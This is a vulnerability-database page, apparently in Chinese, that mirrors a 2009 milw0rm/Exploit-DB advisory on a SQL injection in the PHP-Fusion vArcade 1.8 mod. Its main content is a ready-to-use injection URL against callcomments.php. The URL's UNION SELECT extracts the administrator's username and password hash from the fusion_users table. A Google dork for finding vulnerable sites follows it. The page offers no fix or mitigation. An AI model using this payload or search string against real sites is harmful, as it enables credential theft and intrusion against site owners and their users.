PHP-Fusion Mod vArcade 1.8 - 'comment_id' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057243 漏洞类型
发布时间 2009-01-08 更新时间 2009-01-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7703
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
----------------------------------------------------------------

Script : PHP-Fusion Mod vArcade 1.8

Type : Sql Injection Vulnerability

Risk : High

----------------------------------------------------------------

Download From : http://venue.nu/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

My Official Website : HTTP://FEREIDANI.IR

Our Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Sql Injection Vulnerability :

Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*

Google Dark : inurl:/infusions/varcade/

----------------------------------------------------------------

                        Tnx : God

          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------

# milw0rm.com [2009-01-08]